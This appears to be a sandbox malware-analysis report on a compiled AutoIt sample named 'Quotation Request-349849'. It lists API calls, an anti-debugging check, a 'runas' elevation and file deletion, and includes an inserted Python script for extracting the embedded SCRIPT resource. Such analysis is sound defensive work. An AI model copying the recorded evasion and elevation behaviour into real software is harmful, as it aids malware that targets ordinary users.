File and path: CreateFileW, ReadFile, SetFilePointerEx, CloseHandle, CopyFileW, DeleteFileW, GetTempPathW, GetTempFileNameW, GetFullPathNameW, GetLongPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetOpenFileNameW, GetFileType, GetStdHandle
Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
Process and system enumeration: GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, GetSystemTimeAsFileTime, GetStartupInfoW, GetCommandLineW, GetModuleFileNameW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, HeapAlloc, IsProcessorFeaturePresent, IsThemeActive, SystemParametersInfoW, GetStringTypeW
Threads, synchronisation and UI: CreateThread, GetCurrentThreadId, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, Sleep, EncodePointer, DecodePointer, OleInitialize, RegisterWindowMessageW
Anti-debugging and error handling: IsDebuggerPresent (the node at 7d3b7a has two successors, MessageBoxA at 80d272 and plain code at 7d3b88, so the debugger check selects between a message box and normal continuation), SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, MessageBoxA
calls 103636->103641 103637 7d7667 59 API calls 103637->103641 103638 826e8f 59 API calls 103638->103641 103639->103621 103640 7f2d40 67 API calls __cinit 103640->103641 103641->103624 103641->103625 103641->103628 103641->103634 103641->103636 103641->103637 103641->103638 103641->103640 103641->103642 103643 8109d6 103641->103643 103646 7da55a 103641->103646 103714 7dc8c0 341 API calls 2 library calls 103641->103714 103715 7db900 60 API calls Mailbox 103641->103715 103722 839e4a 89 API calls 4 library calls 103643->103722 103723 839e4a 89 API calls 4 library calls 103645->103723 103721 839e4a 89 API calls 4 library calls 103646->103721 103647->103621 103649->103621 103716 7df6a3 341 API calls 103650->103716 103651->103621 103654 7d9c90 Mailbox 59 API calls 103653->103654 103654->103657 103720 839e4a 89 API calls 4 library calls 103655->103720 103657->103619 103657->103642 103659 7d9d3c 60 API calls 103658->103659 103660 7db22d 103659->103660 103662 7d9d3c 60 API calls 103660->103662 103661->103621 103662->103650 103719 839e4a 89 API calls 4 library calls 103663->103719 103667 84cadd 130 API calls 103666->103667 103668 84df33 103667->103668 103668->103621 103670 838723 103669->103670 103671 83871e 103669->103671 103670->103621 103724 8377b3 103671->103724 103674 7d7667 59 API calls 103673->103674 103675 84c2f4 103674->103675 103676 7d7667 59 API calls 103675->103676 103677 84c2fc 103676->103677 103678 7d7667 59 API calls 103677->103678 103679 84c304 103678->103679 103680 7d9837 84 API calls 103679->103680 103692 84c312 103680->103692 103681 7d7924 59 API calls 103681->103692 103682 7d7bcc 59 API calls 103682->103692 103683 84c528 Mailbox 103683->103621 103684 84c4e2 103686 7d7cab 59 API calls 103684->103686 103689 84c4ef 103686->103689 103687 84c4fd 103690 7d7cab 59 API calls 103687->103690 103688 7d8047 59 API calls 103688->103692 103691 7d7b2e 59 API calls 103689->103691 103693 84c50c 103690->103693 103695 84c4fb 103691->103695 103692->103681 103692->103682 
103692->103683 103692->103684 103692->103687 103692->103688 103694 7d7e4f 59 API calls 103692->103694 103692->103695 103697 7d7e4f 59 API calls 103692->103697 103702 7d9837 84 API calls 103692->103702 103703 7d7cab 59 API calls 103692->103703 103704 7d7b2e 59 API calls 103692->103704 103696 7d7b2e 59 API calls 103693->103696 103698 84c3a9 CharUpperBuffW 103694->103698 103695->103683 103749 7d9a3c 59 API calls Mailbox 103695->103749 103696->103695 103699 84c469 CharUpperBuffW 103697->103699 103747 7d843a 68 API calls 103698->103747 103748 7dc5a7 69 API calls 2 library calls 103699->103748 103702->103692 103703->103692 103704->103692 103706 837962 103705->103706 103707 7f0db6 Mailbox 59 API calls 103706->103707 103708 837970 103707->103708 103709 83797e 103708->103709 103710 7d7667 59 API calls 103708->103710 103709->103621 103710->103709 103750 8260c0 103711->103750 103713 82618c 103713->103621 103714->103641 103715->103641 103716->103663 103717->103621 103718->103630 103719->103657 103720->103657 103721->103642 103722->103645 103723->103642 103725 8378ea 103724->103725 103726 8377ca 103724->103726 103725->103670 103727 8377e2 103726->103727 103728 837821 103726->103728 103730 83780a 103726->103730 103727->103730 103731 8377f2 103727->103731 103735 7f0db6 Mailbox 59 API calls 103728->103735 103743 83783e 103728->103743 103729 7f0db6 Mailbox 59 API calls 103734 837800 Mailbox _memmove 103729->103734 103730->103729 103738 7f0db6 Mailbox 59 API calls 103731->103738 103732 837877 103737 7f0db6 Mailbox 59 API calls 103732->103737 103733 837869 103736 7f0db6 Mailbox 59 API calls 103733->103736 103740 7f0db6 Mailbox 59 API calls 103734->103740 103735->103743 103736->103734 103739 83787d 103737->103739 103738->103734 103745 83746b 59 API calls Mailbox 103739->103745 103740->103725 103742 837889 103746 7d5a15 61 API calls Mailbox 103742->103746 103743->103732 103743->103733 103743->103734 103745->103742 103746->103734 103747->103692 103748->103692 103749->103683 103751 
8260e8 103750->103751 103752 8260cb 103750->103752 103751->103713 103752->103751 103754 8260ab 59 API calls Mailbox 103752->103754 103754->103752 103755 7d3633 103756 7d366a 103755->103756 103757 7d3688 103756->103757 103758 7d36e7 103756->103758 103796 7d36e5 103756->103796 103759 7d374b PostQuitMessage 103757->103759 103760 7d3695 103757->103760 103762 7d36ed 103758->103762 103763 80d0cc 103758->103763 103787 7d36d8 103759->103787 103767 80d154 103760->103767 103768 7d36a0 103760->103768 103761 7d36ca DefWindowProcW 103761->103787 103764 7d3715 SetTimer RegisterWindowMessageW 103762->103764 103765 7d36f2 103762->103765 103810 7e1070 10 API calls Mailbox 103763->103810 103772 7d373e CreatePopupMenu 103764->103772 103764->103787 103769 7d36f9 KillTimer 103765->103769 103770 80d06f 103765->103770 103815 832527 71 API calls _memset 103767->103815 103773 7d36a8 103768->103773 103774 7d3755 103768->103774 103807 7d443a Shell_NotifyIconW _memset 103769->103807 103780 80d074 103770->103780 103781 80d0a8 MoveWindow 103770->103781 103771 80d0f3 103811 7e1093 341 API calls Mailbox 103771->103811 103772->103787 103778 7d36b3 103773->103778 103783 80d139 103773->103783 103800 7d44a0 103774->103800 103784 7d36be 103778->103784 103785 80d124 103778->103785 103788 80d097 SetFocus 103780->103788 103789 80d078 103780->103789 103781->103787 103782 7d370c 103808 7d3114 DeleteObject DestroyWindow Mailbox 103782->103808 103783->103761 103814 827c36 59 API calls Mailbox 103783->103814 103784->103761 103812 7d443a Shell_NotifyIconW _memset 103784->103812 103813 832d36 81 API calls _memset 103785->103813 103786 80d166 103786->103761 103786->103787 103788->103787 103789->103784 103793 80d081 103789->103793 103809 7e1070 10 API calls Mailbox 103793->103809 103795 80d134 103795->103787 103796->103761 103798 80d118 103799 7d434a 68 API calls 103798->103799 103799->103796 103801 7d4539 103800->103801 103802 7d44b7 _memset 103800->103802 103801->103787 103803 7d407c 61 API calls 103802->103803 
103806 7d44de 103803->103806 103804 7d4522 KillTimer SetTimer 103804->103801 103805 80d4ab Shell_NotifyIconW 103805->103804 103806->103804 103806->103805 103807->103782 103808->103787 103809->103787 103810->103771 103811->103784 103812->103798 103813->103795 103814->103796 103815->103786 103816 838d0d 103817 838d20 103816->103817 103818 838d1a 103816->103818 103820 838d31 103817->103820 103821 7f2d55 _free 58 API calls 103817->103821 103819 7f2d55 _free 58 API calls 103818->103819 103819->103817 103822 838d43 103820->103822 103823 7f2d55 _free 58 API calls 103820->103823 103821->103820 103823->103822 103824 81416f 103828 825fe6 103824->103828 103826 81417a 103827 825fe6 85 API calls 103826->103827 103827->103826 103829 826020 103828->103829 103834 825ff3 103828->103834 103829->103826 103830 826022 103840 7d9328 84 API calls Mailbox 103830->103840 103831 826027 103833 7d9837 84 API calls 103831->103833 103835 82602e 103833->103835 103834->103829 103834->103830 103834->103831 103837 82601a 103834->103837 103836 7d7b2e 59 API calls 103835->103836 103836->103829 103839 7d95a0 59 API calls _wcsstr 103837->103839 103839->103829 103840->103831

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B68
                                                      • IsDebuggerPresent.KERNEL32 ref: 007D3B7A
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,008952F8,008952E0,?,?), ref: 007D3BEB
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                        • Part of subcall function 007E092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007D3C14,008952F8,?,?,?), ref: 007E096E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C6F
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00887770,00000010), ref: 0080D281
                                                      • SetCurrentDirectoryW.KERNEL32(?,008952F8,?,?,?), ref: 0080D2B9
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00884260,008952F8,?,?,?), ref: 0080D33F
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0080D346
                                                        • Part of subcall function 007D3A46: GetSysColorBrush.USER32(0000000F), ref: 007D3A50
                                                        • Part of subcall function 007D3A46: LoadCursorW.USER32(00000000,00007F00), ref: 007D3A5F
                                                        • Part of subcall function 007D3A46: LoadIconW.USER32(00000063), ref: 007D3A76
                                                        • Part of subcall function 007D3A46: LoadIconW.USER32(000000A4), ref: 007D3A88
                                                        • Part of subcall function 007D3A46: LoadIconW.USER32(000000A2), ref: 007D3A9A
                                                        • Part of subcall function 007D3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AC0
                                                        • Part of subcall function 007D3A46: RegisterClassExW.USER32(?), ref: 007D3B16
                                                        • Part of subcall function 007D39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A03
                                                        • Part of subcall function 007D39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A24
                                                        • Part of subcall function 007D39D5: ShowWindow.USER32(00000000,?,?), ref: 007D3A38
                                                        • Part of subcall function 007D39D5: ShowWindow.USER32(00000000,?,?), ref: 007D3A41
                                                        • Part of subcall function 007D434A: _memset.LIBCMT ref: 007D4370
                                                        • Part of subcall function 007D434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D4415
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 0080D279
                                                      • runas, xrefs: 0080D33A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 529118366-3287110873
                                                      • Opcode ID: ed588609b59cb84a228f02326635dd4b4ba3db8f52943c358983124c28d89f9a
                                                      • Instruction ID: 27209713c7721f34f405f246791034ebf87a865135e4764beac76ccb2ce0ef88
                                                      • Opcode Fuzzy Hash: ed588609b59cb84a228f02326635dd4b4ba3db8f52943c358983124c28d89f9a
                                                      • Instruction Fuzzy Hash: 2151E070908248EEDF02BBF4DC099ED7B79FB04710F084067F515A23A2EA785645CB22

                                                      Control-flow Graph

(Rendered control-flow graph for the function at 7d49a0 omitted; its nodes call GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo, listed under APIs below.)
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 007D49CD
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • GetCurrentProcess.KERNEL32(?,0085FAEC,00000000,00000000,?), ref: 007D4A9A
                                                      • IsWow64Process.KERNEL32(00000000), ref: 007D4AA1
                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007D4AE7
                                                      • FreeLibrary.KERNEL32(00000000), ref: 007D4AF2
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 007D4B23
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 007D4B2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: 2569a26ec4001b28e89bf13935cca7f02876e8917f598783737f7b6918c7cb50
                                                      • Instruction ID: 0ec9ee20bf538fee004072959ba1c7cf990e89789136799cfc44128ee12ea42d
                                                      • Opcode Fuzzy Hash: 2569a26ec4001b28e89bf13935cca7f02876e8917f598783737f7b6918c7cb50
                                                      • Instruction Fuzzy Hash: 4B9193319897C0DAC731DB68D9545AABFF5BF6A300B448DAED0C693B42D238A508C769

                                                      Control-flow Graph

(Rendered control-flow graph for the function at 7d4e89 omitted; it calls CreateStreamOnHGlobal, then FindResourceExW, LoadResource, SizeofResource and LockResource, listed under APIs below.)
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007D4D8E,?,?,00000000,00000000), ref: 007D4E99
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D4D8E,?,?,00000000,00000000), ref: 007D4EB0
                                                      • LoadResource.KERNEL32(?,00000000,?,?,007D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007D4E2F), ref: 0080D937
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,007D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007D4E2F), ref: 0080D94C
                                                      • LockResource.KERNEL32(007D4D8E,?,?,007D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007D4E2F,00000000), ref: 0080D95F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 03dfafab355795da916a72996181e33ef75dc4757fa4949fa76cf9f31c2be146
                                                      • Instruction ID: 3bc2c9e8e9f10b993ed5f91816e32d242c3d1298084019d8a8d32d73af80fb59
                                                      • Opcode Fuzzy Hash: 03dfafab355795da916a72996181e33ef75dc4757fa4949fa76cf9f31c2be146
                                                      • Instruction Fuzzy Hash: DB117CB5240700BFD7218BA5EC48F677BBAFBC5B12F20426DF506C6290DB75EC008A61
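The FindResourceExW call above passes resource type 0000000A (RT_RCDATA) and the name SCRIPT, then LoadResource, SizeofResource and LockResource hand the bytes to a CreateStreamOnHGlobal stream. That is the AutoIt v3 stub locating its compiled script inside its own PE resources, which is why the report flags the binary as a likely compiled AutoIt script. An analyst can do the same lookup statically, without running the sample. The script below is an added example, not code from the Joe Sandbox report, from AutoIt or from this sample: it walks the standard PE resource tree (type, then name, then language) with the Python standard library only and returns the raw resource bytes. It assumes a well-formed PE layout; the `build_rsrc` helper is a constructed test fixture, and the constructed payload stands in for the real script. Decoding the AutoIt script format from the extracted bytes is a separate step not shown here.

```python
"""Statically locate a named RT_RCDATA resource (e.g. "SCRIPT") in a PE file.

Added example, not from the report or from AutoIt. Mirrors the stub's call
FindResourceExW(hModule, RT_RCDATA, L"SCRIPT", lang) by walking the resource
tree type -> name -> language, stdlib only.
"""
import struct

RT_RCDATA = 10          # the 0000000A type argument seen in FindResourceExW
_HIGH_BIT = 0x80000000  # set when a field is an offset to a string/subdirectory
_LOW31 = 0x7FFFFFFF


def _read_dir(rsrc, off):
    """Entries of the IMAGE_RESOURCE_DIRECTORY at `off` as (key, target, is_subdir).

    `key` is an int ID or, for named entries, the decoded UTF-16 name; `target`
    is an offset relative to the start of the resource section.
    """
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    entries = []
    for i in range(n_named + n_id):
        name_field, data_field = struct.unpack_from("<II", rsrc, off + 16 + 8 * i)
        if name_field & _HIGH_BIT:                       # IMAGE_RESOURCE_DIR_STRING_U
            s = name_field & _LOW31
            (length,) = struct.unpack_from("<H", rsrc, s)
            key = rsrc[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name_field
        entries.append((key, data_field & _LOW31, bool(data_field & _HIGH_BIT)))
    return entries


def _lookup(rsrc, dir_off, want):
    """Find `want` (int ID, or case-insensitive name) in one directory level."""
    for key, target, is_subdir in _read_dir(rsrc, dir_off):
        if key == want or (isinstance(key, str) and isinstance(want, str)
                           and key.upper() == want.upper()):
            return target, is_subdir
    return None


def find_resource(rsrc, rsrc_rva, res_type, name, lang=None):
    """Return the bytes of resource (res_type, name[, lang]) or None.

    `rsrc` is the resource section's bytes and `rsrc_rva` its RVA, needed
    because IMAGE_RESOURCE_DATA_ENTRY.OffsetToData is an RVA, not an offset.
    """
    hit = _lookup(rsrc, 0, res_type)
    if not hit or not hit[1]:
        return None
    hit = _lookup(rsrc, hit[0], name)
    if not hit or not hit[1]:
        return None
    if lang is None:                       # like FindResource: first language wins
        leaves = _read_dir(rsrc, hit[0])
        if not leaves or leaves[0][2]:
            return None
        data_entry = leaves[0][1]
    else:
        hit = _lookup(rsrc, hit[0], lang)
        if not hit or hit[1]:
            return None
        data_entry = hit[0]
    data_rva, size = struct.unpack_from("<II", rsrc, data_entry)
    start = data_rva - rsrc_rva
    if start < 0 or start + size > len(rsrc):
        return None                        # data lies outside the blob we were given
    return rsrc[start:start + size]


def rsrc_from_pe(image):
    """Return (rsrc_bytes, rsrc_rva) from raw PE file bytes (PE32 or PE32+)."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    (n_sections,) = struct.unpack_from("<H", image, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 20)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", image, opt)
    data_dir = opt + (112 if magic == 0x20B else 96)
    dir_rva, _ = struct.unpack_from("<II", image, data_dir + 2 * 8)  # entry 2 = resources
    sect = opt + opt_size
    for i in range(n_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, sect + 40 * i + 8)
        if va <= dir_rva < va + max(vsize, raw_size):
            skip = dir_rva - va
            return image[raw_ptr + skip:raw_ptr + raw_size], dir_rva
    raise ValueError("resource directory RVA is not inside any section")


def build_rsrc(rsrc_rva, res_type, name, lang, payload):
    """Constructed test fixture: a minimal resource tree holding one named entry.

    Layout: root dir (1 ID entry) @0 -> type dir (1 named entry) @24 ->
    name dir (1 ID entry) @48 -> data entry @72 -> name string @88 -> payload.
    """
    def hdr(named, ids):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)
    name_u16 = name.encode("utf-16-le")
    str_off = 88
    payload_off = (str_off + 2 + len(name_u16) + 3) & ~3
    blob = (hdr(0, 1) + struct.pack("<II", res_type, _HIGH_BIT | 24)
            + hdr(1, 0) + struct.pack("<II", _HIGH_BIT | str_off, _HIGH_BIT | 48)
            + hdr(0, 1) + struct.pack("<II", lang, 72)
            + struct.pack("<IIII", rsrc_rva + payload_off, len(payload), 0, 0))
    blob += struct.pack("<H", len(name)) + name_u16
    return blob + b"\0" * (payload_off - len(blob)) + payload


if __name__ == "__main__":
    import sys
    rsrc, rva = rsrc_from_pe(open(sys.argv[1], "rb").read())
    data = find_resource(rsrc, rva, RT_RCDATA, "SCRIPT")
    print("no RT_RCDATA/SCRIPT resource" if data is None else f"{len(data)} bytes")
```

Run it as `python extract_script.py sample.exe` (file name assumed) to get the size of the embedded SCRIPT resource; change the final `print` to write `data` to disk when you want the blob itself. The presence of an RT_RCDATA resource named SCRIPT together with the "This is a third-party compiled AutoIt script." string is a cheap static triage signal for compiled AutoIt, independent of any packing of the script contents.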
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID:
                                                      • API String ID: 3964851224-0
                                                      • Opcode ID: 0a14fc05e5645f42af0872380ab8a1d1e5cdd5695db428f19bacc620842f3995
                                                      • Instruction ID: 625a78a7f24ce3b87ef3298e1f3a77abb491ad00d9281196e0035c353a68f69d
                                                      • Opcode Fuzzy Hash: 0a14fc05e5645f42af0872380ab8a1d1e5cdd5695db428f19bacc620842f3995
                                                      • Instruction Fuzzy Hash: 0F924970608381CFD720DF15C484B6AB7E5FF89304F14896DE98A9B352D7B9E885CB92
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,0080E398), ref: 0083446A
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0083447B
                                                      • FindClose.KERNEL32(00000000), ref: 0083448B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
                                                      • Instruction ID: 6970f719103c1f6b2ca53b0145ec68f189669ca6254b62ac48c56096940615b0
                                                      • Opcode Fuzzy Hash: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
                                                      • Instruction Fuzzy Hash: 8BE0D8724116046752106B38EC0D4E9775CFE45336F100725FA35D21E0E778690096DA
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00813E62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: db6b715018890b641e7aac7130b4b419c2c4c5e497a554957da2e890dedf998b
                                                      • Instruction ID: 92e6b58c86480b8e85b087bbf6106f2c961cdc660eeb264b2ab36f86f8bd62a8
                                                      • Opcode Fuzzy Hash: db6b715018890b641e7aac7130b4b419c2c4c5e497a554957da2e890dedf998b
                                                      • Instruction Fuzzy Hash: EAA29075A00209CFCB15EF58C480AADB7B6FF58314F68805AE906AF351D779ED82CB91
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0A5B
                                                      • timeGetTime.WINMM ref: 007E0D16
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007E0E53
                                                      • Sleep.KERNEL32(0000000A), ref: 007E0E61
                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 007E0EFA
                                                      • DestroyWindow.USER32 ref: 007E0F06
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007E0F20
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00814E83
                                                      • TranslateMessage.USER32(?), ref: 00815C60
                                                      • DispatchMessageW.USER32(?), ref: 00815C6E
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00815C82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 4212290369-3242690629
                                                      • Opcode ID: 1923863324745a5f95a5d236ea47fd2d99833203c0c41b7152e98d3ed7e79b2c
                                                      • Instruction ID: 466eb7bedb9c4b260d77c67f9ec8e80511409b4ceac9366242a73c56065a0f88
                                                      • Opcode Fuzzy Hash: 1923863324745a5f95a5d236ea47fd2d99833203c0c41b7152e98d3ed7e79b2c
                                                      • Instruction Fuzzy Hash: 3EB2B270609781DFD724DF24C884BAAB7E9FF84304F14491EE599D72A1DB78E884CB92

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00838F5F: __time64.LIBCMT ref: 00838F69
                                                        • Part of subcall function 007D4EE5: _fseek.LIBCMT ref: 007D4EFD
                                                      • __wsplitpath.LIBCMT ref: 00839234
                                                        • Part of subcall function 007F40FB: __wsplitpath_helper.LIBCMT ref: 007F413B
                                                      • _wcscpy.LIBCMT ref: 00839247
                                                      • _wcscat.LIBCMT ref: 0083925A
                                                      • __wsplitpath.LIBCMT ref: 0083927F
                                                      • _wcscat.LIBCMT ref: 00839295
                                                      • _wcscat.LIBCMT ref: 008392A8
                                                        • Part of subcall function 00838FA5: _memmove.LIBCMT ref: 00838FDE
                                                        • Part of subcall function 00838FA5: _memmove.LIBCMT ref: 00838FED
                                                      • _wcscmp.LIBCMT ref: 008391EF
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839824
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839837
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00839452
                                                      • _wcsncpy.LIBCMT ref: 008394C5
                                                      • DeleteFileW.KERNEL32(?,?), ref: 008394FB
